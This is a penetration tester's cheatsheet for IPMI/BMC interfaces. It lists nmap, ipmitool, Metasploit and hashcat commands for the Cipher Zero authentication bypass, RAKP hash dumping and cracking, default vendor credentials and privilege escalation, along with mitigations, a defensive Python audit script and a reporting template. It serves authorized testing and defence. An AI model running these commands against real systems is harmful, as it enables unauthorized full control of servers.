🛡️ Methodology Checklist
- Detect IPMI: `nmap -sU -p 623 [TARGET]` or Metasploit scanner
- Check cipher 0 auth bypass: `ipmitool -I lanplus -C 0 -H [TARGET] -U admin -P "" user list`
- Dump password hashes (RAKP): MSF module `ipmi_dumphashes`
- Crack hashes: `hashcat -m 7300 ipmi_hashes.txt [wordlist]`
- Try default credentials: admin/admin, admin/password, ADMIN/ADMIN
- If access: check boot order, console redirection, power control
- Document IPMI firmware version and access level gained
🎯 Operational Context
Think Dumber First: Test Cipher Zero before anything else; it bypasses authentication entirely on a majority of unpatched BMCs. If patched, spray default credentials: admin/admin, ADMIN/ADMIN, root/calvin (Dell iDRAC default). BMC access = out-of-band server control, hardware-level persistence, and BIOS-level access.
When you land here: UDP/623 open in nmap. Run MSF ipmi_version scanner to identify protocol version. If IPMI v2.0, run ipmi_cipher_zero — if vulnerable, dump hashes with ipmi_dumphashes. Crack offline with hashcat mode 7300.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `sudo nmap -sU --script ipmi-version -p 623 [TARGET_IP]` | Detect IPMI version and auth capabilities |
| `msf6 > use auxiliary/scanner/ipmi/ipmi_version` | Metasploit IPMI version scanner |
| `msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes` | Dump RAKP hashes for default users |
| `set OUTPUT_HASHCAT_FILE /tmp/ipmi_hashes` | Save hashes for offline cracking |
| `hashcat -m 7300 ipmi_hashes.txt /usr/share/wordlists/rockyou.txt` | Dictionary attack on IPMI RAKP hashes |
| `hashcat -m 7300 ipmi.txt -a 3 -1 ?d?u ?1?1?1?1?1?1?1?1` | Mask attack for HP iLO default passwords (8 chars, uppercase + digits) |
🔬 Deep Dive & Workflow
Initial Enumeration
- Nmap scan: `sudo nmap -sU --script ipmi-version -p 623 [TARGET_IP]`
- Note IPMI version: IPMI-2.0 is vulnerable to RAKP hash dump
- Check `UserAuth: PassAuth` settings in scan output
- Try Metasploit if Nmap inconclusive: `auxiliary/scanner/ipmi/ipmi_version`
- Try default credentials (table below)
Attacks
- Dump RAKP hashes: `auxiliary/scanner/ipmi/ipmi_dumphashes`
- Set `OUTPUT_HASHCAT_FILE` to save hashes
- Crack with hashcat mode 7300: `hashcat -m 7300 ipmi_hashes.txt rockyou.txt`
- If HP iLO and dictionary fails → mask attack: `hashcat -m 7300 ipmi.txt -a 3 -1 ?d?u ?1?1?1?1?1?1?1?1`
- With credentials → access BMC web console (power control, BIOS, serial)
- BMC access ≈ physical server access
Core Concept
IPMI (Intelligent Platform Management Interface) provides hardware-based host management via a BMC (Baseboard Management Controller) — independent of CPU, BIOS, and OS. Allows “out-of-band” server management even when powered off.
Compromising IPMI ≈ physical access to the server.
Default Credentials
| Product | Username | Password |
|---|---|---|
| Dell iDRAC | root | calvin |
| Supermicro | ADMIN | ADMIN |
| HP iLO | Administrator | 8-char randomized (A-Z, 0-9) |
IPMI 2.0 RAKP Vulnerability
Critical design flaw: the server sends the salted password hash of a user before authentication completes. An attacker knowing only a valid username (defaults: admin, root, Administrator) can dump hashes without credentials.
Hashcat mode 7300 — format: user:salt:hash...
HP iLO mask pattern: 8 characters, uppercase letters + digits only.
Mitigation
- Segment IPMI interfaces on a dedicated Management VLAN — never expose to general network or internet.
- Change all default passwords immediately.
- Keep BMC firmware updated.
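A defender-side audit of the cipher-suite setting behind the Cipher Zero finding, added here as an example (not part of the original cheatsheet): it parses the output of `ipmitool lan print <channel>` and flags a BMC that still accepts Cipher Suite 0 at any privilege level. The sample output is constructed, channel 1 is assumed, and `ipmitool` is assumed to be on the PATH for the live check.

```python
import re
import subprocess

# Constructed sample of `ipmitool lan print 1` from a BMC that still permits
# Cipher Suite 0 at ADMIN level: position 0 of "Cipher Suite Priv Max" is 'a'.
# Typical remediation is `ipmitool lan set 1 cipher_privs XaaaXXaaaXXaaXX`
# (position 0 set to X), after which this audit should report "disabled".
SAMPLE_LAN_PRINT = """\
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
IP Address              : 192.0.2.10
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
                        :     a=ADMIN
"""

PRIV_NAMES = {"X": "disabled", "c": "CALLBACK", "u": "USER",
              "o": "OPERATOR", "a": "ADMIN", "O": "OEM"}


def parse_lan_print(text):
    """Turn the 'Key : Value' lines of `ipmitool lan print` into a dict.
    Indented legend continuation lines (no key) are skipped."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z][^:]*?)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields


def cipher_zero_status(text):
    """Report whether Cipher Suite 0 is offered and the max privilege it grants."""
    fields = parse_lan_print(text)
    suites = [s for s in fields.get("RMCP+ Cipher Suites", "").split(",") if s]
    priv = fields.get("Cipher Suite Priv Max", "")
    # Character i of the Priv Max string is the maximum privilege for suite i.
    priv0 = priv[0] if priv else "X"
    return {"listed": "0" in suites,
            "priv": PRIV_NAMES.get(priv0, "unknown"),
            "vulnerable": "0" in suites and priv0 != "X"}


def audit_local_bmc(channel=1):
    """Query the local BMC (ipmitool on PATH assumed) and audit the result."""
    out = subprocess.run(["ipmitool", "lan", "print", str(channel)],
                         capture_output=True, text=True, check=True).stdout
    return cipher_zero_status(out)


if __name__ == "__main__":
    print(cipher_zero_status(SAMPLE_LAN_PRINT))
```

Run the same check across the management VLAN inventory after firmware updates, since a firmware reset can re-enable the default cipher list.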
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| `ipmitool -I lanplus -C 0` fails with 'Unable to establish LAN session' | Cipher Zero patched on this BMC | Try default credential spray: `ipmitool -I lanplus -H [TARGET] -U admin -P admin user list` |
| MSF `ipmi_dumphashes` returns no hashes | IPMI 1.5 (no RAKP), or session limit reached | Use `auxiliary/scanner/ipmi/ipmi_login` with common creds for v1.5; check MSF output for IPMI version |
| hashcat mode 7300 cracks but creds rejected on web interface | Hash corresponds to a service account, not web admin | Try all cracked usernames against BMC web UI on port 443/80; check username from hash output |
| UDP 623 shows 'open\|filtered' but ipmitool hangs | Firewall allows UDP but blocks IPMI application layer | |
| IPMI credential login works but no commands execute | Insufficient privilege level | Try `-L ADMINISTRATOR`; escalate: `ipmitool -I lanplus -H [TARGET] -U [USER] -P [PASS] -L ADMINISTRATOR user set privilege 2 4` |
📝 Reporting Trigger
Finding Title: IPMI Cipher Zero Authentication Bypass / Default BMC Credentials

Impact: Full out-of-band server control: power cycling, virtual console access, BIOS modification, and OS-independent persistence. IPMI hash dump enables offline password cracking for OS-level accounts if password reuse exists.

Root Cause: BMC firmware supports Cipher Suite 0 (no-auth cipher) on UDP/623, or default vendor credentials not changed post-deployment.

Recommendation: Update BMC firmware to latest version. Disable Cipher Suite 0 in IPMI configuration. Change all default BMC credentials. Isolate IPMI/BMC network segment from production network. Disable IPMI if out-of-band management is not operationally required.